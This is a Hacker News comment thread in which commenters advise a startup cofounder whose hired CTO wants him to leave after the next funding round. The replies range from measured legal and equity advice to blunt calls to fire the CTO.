1. The situation is poisoned. If you stay and force a battle of wills, it will be hugely distracting in a way that adds no value to the company (and remember, building a great company is why you did this in first place), not to mention personally painful for you. That the CEO and CTO have lost confidence in you means it's just going to suck from here on out. Even if you win, that just means disempowering the CTO (or replacement CTO if the current one leaves in frustration, which doesn't seem improbable). Maybe the CTO is wrong, but if he's saddled with someone he doesn't want and can't get rid of because of special cofounder status, it's going to create a pretty shitty working environment for everyone. And if he wins (say, because the CEO votes you out), then that's the same as you sliding out anyway.

2. The CTO definitely hasn't overstepped his boundaries; he's doing his job. He's responsible for running the engineering team and delivering a product. If he thinks you're holding the company back, he'd be being irresponsible not to do something about it. Of course, he could be wrong and there's no way for me (or anyone else here) to determine that. So you have to ask yourself what you really think is best for the company. If it's you leaving, tanking the company in a huge fight (or just dragging it down by sticking around) will just destroy whatever equity you have in it. If it's you staying and you're confident (after putting aside your ego, considering it from other peoples' views, etc), then yeah, convince the CEO and then together fire the CTO for being so terribly wrong. But it's not an issue of boundaries. So: would you hire you?

3. Closely related: what are you doing cofounding companies with that little confidence in yourself? If someone came to you and said, "hey, I haven't coded much and don't have a lot of experience", would you think that was a wise investment? Because you went all in on that investment. Do some work with some guidance and lower stakes and learn your craft. I don't at all mean that as "noob go home" (I have no idea how good you actually are); I mean that your description basically acknowledges you don't think you're the right person for the job of technical cofounder.

4. Your CEO sounds clueless and you should take this opportunity to bail out. If the CTO is wrong about you, the CEO's confidence in him is misplaced and he's also allowing unnecessary complications to destroy his engineering team. If the CTO is right that you don't even belong on the team, then why did the CEO partner with you in the first place? Maybe he thought of you as a temporary pawn to sacrificed at the right time. Maybe he just doesn't know what he's doing. None of those are good. Get out.

5. You say in one of the comments that you don't want to lose your unvested shares and that you've taken on a lot of opportunity cost. The whole point of the vesting is that you get what you've worked for. If you don't think the vested equity you have is commensurate with the work you've done, working more isn't going to fix that. You'll just continue getting screwed, putting in more time and earning the same vesting that you're unhappy with. I know you probably feel pot-committed, but the best thing to do when you have a bad hand is fold your cards and move on.

6. Startups are hard. They're painful work, especially when things go bad, to the point that I wonder why we do it in the best of situations. If you throw in the stress of trying to prove you even belong, it's just shitty. Save your happiness and leave.

7. It's important not to think of these decisions as an affront to your pride. The never-say-die bromide of startup cofounders the world over is mostly bullshit. Make sure you're in a healthy situation with a real chance of success. Quitting isn't shameful, but sabotaging your happiness and the value of your investment because it hurts your ego is very unwise. I don't know whether or not I'd be wise in that situation either--I certainly have plenty of ego--but of course that's why you asked us: we're not involved.

My guess is that once you leave, clear your head, and figure out what you want to do next, you'll look back and say, "wow, I'm glad I got out of that."

8
anigbrowl 5 days ago 3 replies      
He's trying to fuck you over. Remind him that he works for you, not the other way around. Start looking for his replacement. Check with a lawyer about the security of your own stake and make sure you are good with the business guy, because the CTO has probably been whispering poison in his ear about you.
9
jw2013 5 days ago 3 replies      
> My question is, does he have a point?

No. He is making the wrong assumption here "that he wouldn't hire me if I wasn't already a founder and not what the company needs". First you ARE a founder- I genuinely do not believe you can't learn the knowledge you needed given how motivated you are. And you are learning. Second, he already admit you are what the company needs (at least during this 3-6 months), so why is he BS you to leave? He's mindset is so wrong for the startup world, just assuming things will take-off and by-then you are not needed anymore. You are desperately needed now; that makes you valuable. Your company probably can't make it to the next milestone in 3-6 months without you, at least it will take longer to hit milestones longer without you. You are valuable, and you feel for the company, just tell him that.

> Is this something that is common?

Yes, but not quite often at this early stage of a startup. I smell some politics of him. Do you two get along well besides tech issues in the company? Since he knows you are still desperately needed now, and he is still making BS about advising you to leave, I can only conclude he probably does not like you (not just in tech realms), and he clearly does not care about the success of the company as much as I do (the company still needs you to be successful at least at this stage of growth).

> Has he overstepped the boundaries?

First thing first, just learn things you need to know fast. You will know when you are making great contributions to the company, and you want that. Don't let your CTO stops you from that. At least when you are working, don't think about the issue with him and grow fast as a coder. I suggest a conversation with him off the work time. If I were you, I would like to know if he had issues with me beyond his doubt in my tech ability.

> It is in my interest however to remain in the company because my equity is vested, the sooner I leave the less I will get in return, apart from my time, and opportunity cost I invested all my personal wealth.

Did you have cliff in your equity vesting? If so have you past the cliff period? I really don't recommend you to leave before all your cliff equity are vested, otherwise you will get next to nothing. Manage to stay with your company at least in the cliff period. Your company wouldn't make this far without you, your company owes you that, and you know through what it should pay you off? Equity. So just manage to get the credit where credit is due.

---

May the best luck be with you.

10
jonsterling 5 days ago 1 reply      
I don't know anything about business or founding a startup: but as an engineer in one, if you have hired a CTO who is better at engineering than you (kudos!) and he/she has asked you to stop writing production code, you should listen. Coding "for old times sake" is pretty damaging when a team of actually trained engineers has just got your old broken code-base under control and instituted better engineering practices. This is part of the typical startup lifecycle: the code that got you here isn't going to get you to the next place, and it's your job to find, hire and enable better engineers to get you to the next level.

But if he actually is asking you to leave the company? He can fuck himself. But seriously, if it is clear that you are hurting more than helping by writing code, please stop. Keep learning, and ease into contributing again slowly.

11
geuis 5 days ago 1 reply      
This is your company, not the CTO's. It's time to fire him.

The ability to code really doesn't have much to do in the long run to the company success. Of the two founders at the company I work for, both could code but one hasn't in a long time and the other only does on occasion. As the team has grown, their responsibilities have shifted. Yours will too.

12
throwa 4 days ago 0 replies      
Honestly, you need to get some self confidence. You need to man up. Being a nice guy in this scenario doesn't help. If the CTO wants to play dirty and ruthless. You must play dirty and ruthless. How did a guy you hire get the guts to tell you he wants to fire you as a co-founder. This means your other co-founder is probably ganging up with him behind your back. You cannot trust both of them. I don't know who owns more percentage of the company betwen you and your co-founder but I want to believe that your CTO is minority stake holder at this point. Don't leave without a thorough fight. The good thing is that you can code no-matter how terrible, you can build a minimum viable product for any future idea you have. Your CEO cannot which is why it is convenient for him to try and co-operate wit the CTO.

Line of action:

1. Start speaking to a lawyer.2. Transition out of code writing role into product visionary role, so the CTO doesn't see your as someone that reports to him. You played a part in not just formulating the initial idea but in coding a prototype, so in essence you can play the role of product visionary. That is Chief Product Officer.

3. Tell you co-founder you are transitioning into a product visionary role with the title of Chief Product Officer. Read up what this role does.

4. Call for a meeting with just you and your co-founder and test his allegiance. Tell him that if a guy you hired wants to fire you then he can also team up with future investors to fire the CEO, so he is not save in the future. So due to trust issues, you intend to fire your CTO after you get a replacement. Show him a list of possible top people in the open-source world using your technology that you intend to open up communication with as possible replacement for the CTO. Sink it into his head that the CTO is replace-able and that culture fit matters more thank skills as you can get a replacement for skillset easier than getting the person with the right skillset and cultural fit. http://www.bhorowitz.com/programming_your_culture

5. Call a meeting with your CTO and tell him you plan to stop writing code and then tell him you also plan to get a new CTO to replace him because you can't have a guy you hired steal your company. Let him know he is also replace-able as you won't have hired him because of poor culture fit even though he is skillful if you knew about the schemer he is.

6. Now that you have man up to both, call a meeting with the CEO and CTO to address any issues relating to what you discussed with them.

7. Watch the shares during any round of funding, so you are not squeezed out. See the company incorporation details and ensure your name is there and you are not deceived by your other co-founder.

8. CTO's are replace-able, don't don't let someone you hired ask you to leave, so that he can take your shares. He probably overstated his importance behind your back to the CEO and asked for more shares and your co-founder felt that if he gets you out of the way he will get the more shares.

If they were bold and ruthless, you must be bold and ruthless too.

sate your importance to founding the company, idea generation, writing enough code to make the CTO, join since he knew you people were not idea only guys.

Kick that CTO out and henceforth watch your co-founder closely.

13
thejosh 5 days ago 0 replies      
"EDIT: He's not asking me to leave now, since I'm still desperately needed, but in 3-6 months time after we have raised more funding."

Means they do actually need you, the CTO is waiting for a payday before kicking you out for a higher stake. Tell the CTO to go stick it if they need you before funding but not after.

14
nashequilibrium 5 days ago 0 replies      
I really don't understand this story, most tech entrepreneurs with successful companies have to hire people better than them, mark zuckerberg, jack dorsey(especially the twitter guys), snapchat etc. You 2 guys are the founders and hired a CTO and the CTO is telling you to leave, imagine the CTO of snapchat telling Evan Spiegal who cannot code to leave, it just doesn't add up.

If i had to guess, your cofounder who is the business guy realizes that the CTO is a better coder than you and is trying to push you out and offer the CTO a better share of the company. You really need to stand up for yourself, do not limit yourself or feel inferior, i mean even Larry and Sergey had to get better programmers than them.

15
gojomo 5 days ago 0 replies      
That's tough. Your last edit gives me the most pause: if you're good enough to be "desperately needed" for this critical pre-funding period, you should be good enough for after, too.

Don't sell yourself short: simply knowing your limits is a major skill, that will let you contribute where you can, grow where you can, and defer to others where you must. Also, having been involved since the start gives knowledge and perspective that can't necessarily be hired elsewhere.

Ultimately if you want to stay -- and especially if you still have the support of your biz cofounder -- you should insist on having the chance to grow with the company, learning as you go along. And the plan for the future needs to be well understood among the principals, before the fundraising, because that process will tend to firm up roles, equity, vesting, employment agreements, etc.

It's true that sometimes a member of the founding team isn't right the commitment or skills or shared-vision isn't there, and perhaps the original title/status/equity even gets in the way of acquiring what's needed. But it sounds like you're humble and flexible enough that you should be able to retain a key role.

If you are considering leaving from, or think you might be pushed out of, a valuable position, you will likely want to consult with a lawyer, separate from the company lawyer, about how to best protect your rights. (The fundraising process itself, and getting the whole company/team into "standard" documents, could either work to your advantage, or make it very easy for you to be booted with very little, so educate yourself early, to avoid signing away anything valuable.)

If intimidated by the idea of talking to a lawyer, remember that many will give a free 30-60 minute initial consultation, so simply by the act of shopping around, always improving your 'executive summary' of your situation before each discussion, you'll learn a ton at no cost. (No two lawyers will have the exact same analysis, so the 5th or 10th you talk to may still improve your understanding.) And if you find someone you like, they may give you quite a bit of continuing good advice simply in return for the future-chance/option-value of representing you in a future dispute.

16
balls187 5 days ago 0 replies      
This is your company. Not the CTO's.

It's time to have a frank discussion with your co-founder and decide what is best for you and for the company.

It may ultimately be best for you to step down, but it shouldn't ever be because of your technical abilities, and it shouldn't be because the CTO believes you should.

There are lots of things you can be doing, and the fact that you CAN code (even if it's not high level) is huge.

There is testing, blogging, social networking posts, Google Analytics, SEO/SEM, recruiting, buying office supplies, soda runs, customer outreach, marketing, more testing, design, investor outreach, product management, program management.

You have so much that you can do, that unless you are a liability (past convictions by the SEC), or so caustic that you are the direct cause for the companies failures, that you still have an important role at your company for many years to come.

And if you do stay, it's time to put the CTO on notice, the CTO works for you.

17
hansy 5 days ago 0 replies      
Provided you're not writing anything that detrimentally impacts the product, there's no reason for you to leave. It's your company.

Now I say this not so you can sit back and let others do the hard work, but for you to figure out how else you can contribute. Every startup, hell every mature company, has issues to deal with on a daily basis. I would be very surprised if there wasn't something else you could be doing for the company.

Worst comes to worst, your job from here on out is to do the tasks nobody else wants to do. From a technical perspective that could mean things like sanitizing the database (if it needs it) or going back and writing some good tests for already-implemented code. From a business perspective, this could mean researching, scraping, generating leads to customers, users, etc. Hell, you can even be the glorified secretary by helping others manage their day-to-day tasks, schedules, appointments. Be the office janitor. Be the guy they send to campus events to talk to students.

If you can no longer contribute to the code for your product, that's OK. There's a million and one things you can do outside that realm to support the product as well as your teammates.

Of course you can always buckle down on your coding game and get better at it. Take online courses. If you (and your company) can afford the time and money, go to one of those schools that teach you to be a better programmer. Tell your CTO that you want to get better and want to learn from him/her.

Be the glue that holds everyone together. Be the swing man that can bounce from activity to activity and ensure everything is running smoothly. Be the founder who's relentlessly resourceful and continues to move the company forward in any shape or form.

18
WoodenChair 5 days ago 0 replies      
Let's assume that what the CTO says is true: you're not a good enough coder that you're any longer needed on a day-to-day basis in a few months. You're still a cofounder and I assume owner of quite a bit of equity of this company. Can't you talk to your other co-founder and find a different role for you on a day to day basis so that your stock still vests?

Or is this all about money/power? Is the new CTO threatened by you for some reason or trying to consolidate his power? Does the new CTO just not like you?

If you and your other co-founder are even remotely close, you guys need to talk. Sit down and figure out what other roles work for you at the company. Perhaps you will need to move out of management and become something like a "developer evangelist" or "head of support". Anything to keep vesting, right?

19
marknutter 5 days ago 0 replies      
Uh, you are a founder. Nobody asks you to leave. You took part of the risk to start the company, the new CTO did not. He does not get to tell you to leave. Ever. Period. I'm actually shocked that you're even considering it.
20
dvirsky 4 days ago 0 replies      
I was once offered the job like this CTO, taking over from a less experienced co-founder, with his consent, while he remains in place. I didn't take the job for other reasons, but I would never have done what this guy is doing to you. And if I had, the CEO would probably fire me.

If you were really that bad, your co-founder CEO should have parted ways with you already. But of course you're not - just the fact that you are aware of your limitations and learning as you go, is evidence of that. I've seen bad technical co-founders, and they are NOT aware of their limitations usually, or don't care about it. And BTW for the quick-n-dirty prototype part of a start-up's life cycle, having crap code is perfectly fine IMHO - as long as you're aware of it and it's a conscious decision.

But if that really is the case (and I doubt it) - and it's for the greater good of the company that you will be fired - you should be very well compensated for your time and effort, as other have mentioned. I've actually seen another situation at a start-up where this was in fact the case, and the company was better off firing a co-founder. It was painful but he was compensated and got to keep most of his shares, so it was probably for his interest as well (though I'm not sure he realized it at the time).

21
headhuntermdk 5 days ago 0 replies      
It's your company.. If your CTO is approaching you like that, send him packing with a pink slip. Do not pass go, do not collect $200.

There is a hell of lot more to building a company than just code and if he can talk to you any way he wants to without any consequences, then you have truly lost.

As others have said, you are supposed to hire people better than you, but that doesn't mean you have to take shit from them either.

Bottom line is don't be a doormat and be prepared to put "boot to ass" if necessary.

Good luck

22
the_cat_kittles 5 days ago 1 reply      
It is REALLY stupid to tell someone you want them to leave in 3 months. Why not wait until three months have gone by? My totally uninformed guess is there is some kind of long game / ego thing at play besides just actually ability to contribute. Don't feel ashamed that you aren't the alpha tech. If you are trying your hardest, and especially as a cofounder, you would be more than welcome at any company I have ever worked at.
23
Paddywack 4 days ago 1 reply      
I had something like this happen to me (on a larger scale) - I folded, and regretted it for years.

Firstly - go straight to see a lawyer. Do not consider anything else before you have done this. Play hard, don't blink!

Secondly. If things don't go your way, play the long game and take your time. Make sure that they know that this will not be resolved quickly, and that having this hanging over them will frustrate their attempts to raise capital.

Behind the scenes this is what I think is going on:

1) The CTO is more experienced, and thinks he is entitled to more than you as a result (you seem to agree that you are relatively inexperienced). He cares little about loyalty and honour as he was not there to see you slogging it out in the early days.

2) What you have set up must be worthwhile and be starting to get valuable, otherwise you would not have attracted a "good" CTO.

3) My thoughts are this is part of the play to attract equity:

- They probably don't want to dilute too much, so would love to grab your shares back before the deal so that they can neaten things out for the new investor

- They probably want the new deal to include shares for the CTO. He is probably niggling for this, and the CEO would prefer to take yours than dilute his.

- They want to put forward a team that has the most value for fund raising. They want solid credentials, and probably feel that yours don't fit the bill.

Good luck hey!

24
wisty 4 days ago 0 replies      
You'd make a better CTO than him. I'd rather work for a CTO who listens to good advice than one who is really sharp, but fucks people over.

Obviously, you are fairly technically competent (or he wouldn't need you around, and you wouldn't have gotten the prototype working). You're also a competent leader - you are listening to technical advice.

But let's say you hire a few more good coders. The CTO feels threatened. Is he going to listen to them when they challenge him, and possibly even step aside if one of them would be a better CTO, or is he going to fuck them over the same way he's fucking you over?

He sounds like a toxic political player. You can think "He's a snake, but he's our snake. His political skills will give us an edge", but it rarely works that way.

If you can, get rid of him, promote yourself to COO, and make the other good programmer CTO or lead programmer or something.

25
benologist 5 days ago 0 replies      
Tell him if he'd like a different boss he should work for a different company. It's your company, he's your employee, and he shouldn't have taken the job if he didn't want to work with and for you, and he's not the right person for the job if he can't.
26
DigitalSea 4 days ago 0 replies      
Maybe he is telling you the truth, but you are a founder, he is a CTO. Maybe it is just a simple case if you are currently contributing code to the idea to step back and let this other guy handle the coding aspect for you. Maybe you can better spend your time as a co-founder elsewhere in your company.

Having said that, if he is forcefully advising you to leave, he is overstepping his boundaries and you need to contain that fire now before he starts turning other employees against you. A toxic employee in a company is like a cancer, it will start in one area and if not treated, it will spread throughout every orifice in your body until it kills you.

If it is a simple matter of you're making it hard for the CTO to do his job because you're committing code and continually breaking things, maybe you need to step back and let him do his job. He can't force you out of your own company, but he might have enough collateral (if he is truly instrumental in your company's success) to get other people to listen to him and force them to make a decision. The CTO is either brutally honest, he's an asshole or he's gunning for your spot in the company.

I would be looking at this from all angles. Don't just assume the CTO is acting alone, for all you know the CEO or your business part is instrumental in his push for you to leave. You're not just an employee, you're a co-founder and you have rights and responsibilities. You're acting like the CTO has already one which will be your downfall. Exercise your rights as a co-founder to fix this.

I would seriously fire the CTO. He might have been instrumental in the companies success, but he has overstepped the line. He has gone beyond the point of merely telling someone they're making his job hard, he's asking a co-founder to leave. It's like some manager at Microsoft asking the CEO to step-down, it's just crazy.

Get legal advice ASAP. Explore your options, but without-a-doubt, get legal counsel right away before you do anything else. My first question to your lawyer would be: Can I fire the CTO cleanly without recourse?

27
linohh 5 days ago 0 replies      
A good CTO would help you improving. I know it's stupid to make assumptions, but I'd assume he's trying to manipulate himself into higher equity in an early stage. Telling someone that he's about to be let go is poison motivation-wise. He may be trying to reduce your performance so he can use your declined output against you.
28
zaidf 5 days ago 0 replies      
The CTO can ask you to improve your coding or to stop coding, afterall he was retained to make those calls. But he cannot ask you to leave the company if you are a proper cofounder. The only person who is in any position to make a request like that is your cofounder or your Board.
29
throawaycofnder 4 days ago 1 reply      
Throwaway here.

I too (like Bluestrike2) was squeezed out of the company I co-founded. I know what its like. And I want to help.

In my situation, I didn't get 3-6 months notice.

There was a "difference of opinion" about the value of work I was putting into the business, and a "difference of opinion" about where the business should go strategically, and one Tuesday morning I entered a grim meeting where I was given an exit contract to consider.

It was a bit of a shock - and they kindly offered me a few days to think about it, letting me go home to cry.

How very kind of them...

...I realised the next day that it was to get me out of the building without incident - and that they'd already begun changing passwords (including my work email password) in the meeting, and continued the rest of the day.

How humiliating

The situation youre in sucks.

For what it's worth (and I say this sincerely), I'm so fucking sorry.

They're assholes. You don't deserve this. And the company never would have got to where it is today without your contribution - and how dare they use the foundation you built (your baby) to screw you.

Then they have the gall to act as if youre "not good enough".

Fuck them.

Youre awesome. Youve done some cool shit. And - as great as the project is youre working on now - I would sincerely hope that it wasnt going to be the crowning achievement of your lifetime. Im absolutely certain that the best for you is yet to come.

I could tell you how good things are going to be in the future, and you probably wouldn't believe me.

I could tell you that the lessons you learn now about control, shareholdership, business politics and more will save you later when friends and colleagues are learning the lessons themselves.

But both of these are cold comfort.

Realistically things are going to get harder for a while (finances, life direction, self confidence, etc), but in a few years as these things get back on track you'll know yourself better, be doing something you love more, and will be much wiser as a result of what you're doing right now.

Now... Let's focus on the next few weeks.

Firstly, ignore the posturing and politics in this thread about whether or not the CTO overstepped his bounds. Realistically, if he has the CEO on-side, it doesnt matter.

Feel free to get up on your high horse about this if you need to, or if it makes you feel better. Or you could wear funny hats. Or do something else equally useless.

When youre ready to do something productive, lets keep going.

30
cmapes 4 days ago 0 replies      
The biggest question is what was you and your co-founders' legal agreement in the bylaws/operating agreements regarding equity given in exchange for assigning your IP (earlier code hackery) to the entity?

If you don't have any sort of a defined equity arrangement in legal contracts, then you have a problem. It's time to speak with an attorney.

If you have some sort of share vesting schedule which will grant you an equity ownership percentage that you consider "fair" then you should consider moving from your current operational position as a software engineer to somewhere else if you want to stay in operations. Otherwise you can sit it out, keep your equity, and participate at the board level.

There will be lots of advice to just "forget about it and walk away". I believe the advice to essentially just "sit back and take it" to be idiotic. If your original positioning on the team was to be "the guy who programs the first iteration of the software that gets us to market" and you failed at that, I can understand where they're trying to push you out as a co-founder. You essentially were a technical co-founder who only partially fulfilled his/her original promise. No offence. In their eyes, you misrepresented yourself, even if that's untrue because they scope-creeped way past your skill level. But the fact is that there WAS some weight that was pulled by you. So you deserve at least partial compensation, whether or not its in the form of equity (if this was promised to you) or payment, or both.

There's some important variables here that have't been covered (mainly current legal agreements) but the main point I'd drive home is stand up for yourself and don't allow yourself to get power played. Yes the situation is sour, but you should be able to get the rest of your founders to agree that you DID contribute something, (as evidenced by the fact that the CTO wants you to leave in the future, not now) so you deserve some equity/payment even if you end up just leaving with it and participating in a liquidity event in the future.

TL;DR If no legal agreements: attorney. If legal agreements w/vague equity terms: attorney. If legal agreements w/ defined equity program you can live with: leave operations, participate at the board level, get bought out at a premium, or just hold equity and wait for a liquidity event.

Make sure there's some restrictions keeping the board from authorizing 1000000000000000 shares and diluting you out too. Good luck!

31
sergiotapia 5 days ago 0 replies      
I'd immediately fire the guy. He works for you not the other way around. You are the co-founder, the big kahuna - not some engineer they hired along the way. Fire his pompous ass.
32
webwright 4 days ago 0 replies      
Founder shuffling is not uncommon. Founders aren't always (or even often) great managers, leaders, or recruiters-- which is what you need to transition into if you're going to stay with the company. I'd encourage you to try to put yourself in their shoes. It doesn't feel fair for you, but if a co-founder who owned a huge vesting stake in the company didn't grow/perform like you'd hoped, would you want to negotiate their exit? Or would you keep them on out of loyalty, knowing that it hurt the company's recruiting efforts, culture, and chances of success?

It sounds like you've raised money, have a business co-founder, and have some other employees. All of those people are (rightfully) should be asking what's best for the company. Hopefully you are too. If the stock you're vesting (hopefully you have vesting schedule!) is outsized compared to the value you bring to the company, you need to fix the problem.

I'd ask your co-founder for their thoughts and (potentially) I'd ask your investors. Unless the CTO is going rogue, he's probably already got support on both of these fronts, which means you can't really do much other than make a scene and/or sue if they want to show you the door, which will damage your company, your stock in it, and your soul. No fun.

Assuming your co-founder agrees with the CTO (likely), options:

1) Say you love the company, don't want to leave, but acknowledge there is a problem with your compensation/value ratio. Negotiate to an agreeable role and pile of stock with the caveat that if you can prove yourself invaluable, you'd like to be able to come back to the table. If they push back, saying you aren't good enough, ask for a 3-6 month trial period to prove your mettle. Bust ass and become indispensable.

2) Leave gracefully, with a negotiated severance/stock package (know that they can dilute you and there are ways they can wipe you out at inopportune times: http://www.geekwire.com/2014/redfins-first-cto-shocked-surpr... )... But unless they are bad actors, you'll get a nice payday if there's even liquidity.

3) Pitch a fit. You'll lose this fight unless you guys botched the company setup or you have allies among the investors. This will hurt the company a lot and it's a bad path.

Good luck and (above all) congratulations for being instrumental in creating a viable company!

33
peteforde 4 days ago 0 replies      
I think you need to be realistic: this situation has gone toxic and it's not likely that you're going to be involved in a few months time. Once you have internalized this and you're still breathing, it will become easier to see the positives.

As others have said, it's highly likely that the CTO and CEO are working together on this. The best thing you can do is - with the assistance of your lawyer - extract yourself as quickly and cleanly as you can manage. Try not to burn bridges; legitimately hope that they succeed. After all, you will retain a substantial percentage of the company.

I can't know the details but from the way you describe the situation, I'm somewhat empathetic to the position that the CTO finds himself in. Your only claim to power is that you were there at the beginning. While that's not a small detail, it's often true that the people who are vitally important to a company in the beginning end up being minor players in the future. See: Craig Newmark or the early support reps at eBay.

In short: you're a founder who is probably no longer playing an irreplaceable role in your company. The CTO wants a meritocracy, and when you're a small team shooting for growth, a founder with just enough tech chops to be a distraction is a major source of risk. To this end, I am surprised that they didn't give you notice already.

I don't say any of this to be mean, it's just that these relationships are hard and most people let awkwardness keep them from telling the hard truth.

34
mefistofele 5 days ago 1 reply      
This "enterprise grade" terminology is suspicious. Did this CTO come up with that as a way to sell his value?

Too often in our industry the word "enterprise" is a smokescreen. Did he bring some real value to the table in terms of what the customer is seeing, or just some basic good development practices sprinkled with magic "enterprise" fairy dust?

Regardless, I have to agree with the other commenters. This guy is not your friend, he is not being straight with you, and he is not looking out for your interests. He could be a massive sociopath asshole, or maybe just an aggressive alpha nerd who doesn't know how to deal with personal problems.

Make sure you're protected. Your equity and your relationship with your cofounder are the two most important things to get covered against this guy, in that order.

35
spidaman 4 days ago 0 replies      
I'm surprised at all of the responses calling for the CTO to be fired. It's very common to have founders who are very good at the very early stage but lack the experience to scale the technology, the team, the culture and the business.

Ask yourself these questions:* Are the CEO cofound and CTO in cahoots, engaged in a malicious equity grab? If so, you chose partners poorly, move on post-funding. If not, then there's probably something important to listen to here. Then ask:* Are your technical and project execution chops going to take the company to the next level of technical, organizational and business scale? If so, you chose a CTO poorly and your CEO co-founder is a fool, move on post-posting. If not, then you have another choice:* Are there other ways you can help the technology, organization and business grow? If so, discuss that transition instead of an exit. Otherwise, be grateful for the lessons learned and move on post-funding.

In all of the "move on" cases, assess that your equity position is aligned with your contribution to where the company will be when it's ultimately profitable or liquid. If it's still very early stage, that proportion may be very small but it will be better to have a small bit of something successful that a large portion of a failed company.

Set aside ego, consult an attorney (as advised elsewhere), don't engage in scorched earth and figure out if these are people you want to continue working with, you can contribute getting the company to the next level and if so, in what role.

36
tpae 5 days ago 0 replies      
If you are a founder:

- Are you needed?

   - yes: then stay.   - no: Do founders hate me?     - yes: get the legal stuff ready, leave with compensation.     - no: Do you have future plans for contribution?       - yes: then get to work!       - no: Do you like your job?         - yes: then get back to work, make contributions.         - no: then why are you asking this question?
I also think that having a CTO does not mean there can't be a technical founder. You can find other things to do, such as build product roadmaps, and with basic technical understanding, you could make positive contributions, not through lines of code, but through the bigger picture.

Reading your post sounds like you don't have self confidence, but you got to find your edge! It doesn't have to be coding. There's more to a startup than lines of code, and if you were there since Day 1, you've already done much more for the company than the CTO. Feel better about yourself, and take a pivot on your perspectives.

37
throwaway_again 4 days ago 0 replies      
I've been where you are right now. (But so has Eduardo Saverin, for whatever that's worth, and I'm no Eduardo Saverin. More accurately, the company I co-founded was no Facebook.) I launched something with two good friends in May 2010, got ousted in November 2011, and have watched the damn thing flourish, predictably, ever since... Here's what I think I learned from that experience:

First, you're asking the wrong question. Whether CTO Boy has "a point," and/or is within "boundaries" (whatever that means) is just self-inflicted misdirection. Reflect on these questions later. For now, the important thing is to make sure that you aren't haunted by doubts over whether you were fairly treated, so that your ability to learn and grow from this experience isn't hopelessly tainted by acrimony and distrust.

Second, recognize that once you've lost the confidence of your co-founder(s), for whatever reason(s), it's best to let them go. It's a free world, or at least it ought to be, and nobody should have to work with anybody they don't want to. That being said, your stake as a founder is worth something, and if the others want to take the operation over for themselves, they need to buy you out at a fair price. Regardless of whether you're a 23-year-old n00b or if you're Marc Andreesen (-- say, wasn't he 23 when... never mind --) what you need to be doing right now is tapping every available resource -- every mentor, teacher, counselor, former manager, and experienced friend -- for an outside perspective. Hate to say it, but HN doesn't count. We don't know enough about your business to really understand your situation or know how to respond to it.

Third, don't undermine your short-term position with free concessions. If they intend to cut you loose, but nonetheless can't survive without your help for the next 3-6 more months, that sounds like value that you're uniquely qualified to supply, and if they want you to forego the long-term returns on that investment, they need to compensate you for that in the short term. So, DO consult with an attorney and/or a seasoned entrepeneur to make sure you're not getting screwed.

All that being said, if you can manage to let your co-founders go their own way while being neither a dick nor a pushover, the community will respect you for it further on up the road.

Good luck.

38
cheetahtech 5 days ago 0 replies      
I say tell him to fuck off. No offense to him or you, but if your willing to keep learning code, then say no and don't look back.

The great thing about being human is our ability to learn. If your willing to learn, then there is nothing to argue about. You want to keep doing this and that is that. It took me 7 years to get where I am now, but I believe I am excellent at coding, where I didn't know anything 7 years ago. So if your willing, tell him to back the f off.

39
mgolawala 5 days ago 0 replies      
He has overstepped his boundaries. The CTO works for the founders, he cannot really fire you (asking you to leave is just a polite war of phrasing it). Remind him that it is the duty of any smart manager to hire people who are smarter than him. That is what you did.

My guess is that your position with your cofounder is rather weak at the moment. The cofounder is probably stepping back and saying "This CTO guy knows what he is doing and if I have to choose, I would much rather go with him". That is a tough situation to be in. If that is true, it isn't your CTO firing you (he is just the front man), it is your cofounder. In fact, ONLY your cofounder can fire you (or your investors if you have sold them a big enough share).

40
mintykeen 5 days ago 0 replies      
Wow, that's tough. I have heard that when a biz scales, sometimes the early employees don't fit as well, because the skills needed are different than when first starting out. To get things going you do a lot of everything, and later they need specialists. How passionate are you about this startup? What does your co-founder think? You would think there could be some role you could fit into, maybe COO? Depending on its success I would hold your ground , or they should be willing to buy you out or something. Best wishes!
41
jf22 5 days ago 1 reply      
I have no idea why people are actually recommending moving on.

You not only own part of the company but can use this experience to grow both technically and professionally.

Don't waste the chance to learn more than you ever could.

Are you taking a salary?

I don't see how you could contribute negatively to the company if you are at least somewhat productive and know the domain.

42
chrisbennet 5 days ago 0 replies      
I wonder how your co-founder will feel when the VC's ask him to leave because he's "just not what the company needs at this time"?

Whose company is this, you and your co-founder's or the CTO's?

43
lnanek2 4 days ago 0 replies      
Keep in mind there is a strong conflict of interest. The business guys love to squeeze out the tech after launch or before a funding round to keep a bigger slice of the pie. Often they won't say that's why they are doing it, but bizarre things will happen like they'll promise to do things then not do them just to start a fight, etc..

I used to work for a startup called WorkSmart Labs. They got Google Ventures funding, but when they knew it would close they go me to agree to take a lot more vesting equity for several months. In exchange they were supposed to help with some things to help my wife's green card process - changing addresses I was taxed and paid at to a joint residence, joint health insurance, etc.. They were happy to pay me less cash, never did the paperwork they promised, and ditched me right when the deal closed so the unvested equity was worthless.

You should watch out for similar very dirty behavior. I don't know if you are in SV, but we hear people all the time talking about things like writing every single line of code for the product, then getting kicked out after funding.

44
kevinpet 4 days ago 0 replies      
Consider the possibility that he's right. The best thing for the company may be that you stop writing code. There also may not be another place for you at the company. Most of the posters seem to assume that whoever posts to HN first is the visionary genius without whom the company will fail. Maybe you're the guy who had the good idea and got it off the ground, but not the best one to make it production ready.

You may want to move into a product management role or you may want to leave. Regardless of what you think is going to happen, you need to clear up all vagueness around your equity and ensure you are going to keep your stake if you leave. You need to review your paperwork and probably talk to a lawyer.

45
jeffdavis 4 days ago 0 replies      
[Not an expert here, just offering another perspective.]

First of all, the CTO telling you he wouldn't hire you at the company you founded is [can't find a polite term]. It's reasonable to say something specific about you is subpar (like coding), and even that you wouldn't fit in a certain role he's planning to define (like full-time coder).

But this is (partially) your company, and an "experienced" CTO came to you because he saw something there. Unless your other partners did all the useful work, you've got some real value -- don't sell yourself short.

There are a lot of options here and you can really make the path for yourself. What is great about you that helped make the company into something? What kind of a role would allow those capabilities to flourish? You could call yourself a Chief Product Officer and say that you have control over what gets delivered and when, what directions the product will take, etc. (not sure if that's what a CPO does, but it doesn't matter).

If you are still inspired to go forward with this startup, and you see such a role for yourself, go make that case. For example, tell the CTO and the CEO that you intend to shed your coding responsibilities as the CTO builds that organization, and get them excited about what you can do as CPO (or whatever). Demand real responsibilities and control, and say that you have the best understanding of the product and the best vision for the future. You could end up much more influential than the CTO, who might end up just being responsible for delivering on your visions. Their whole perspective of you might change, and they might get behind you.

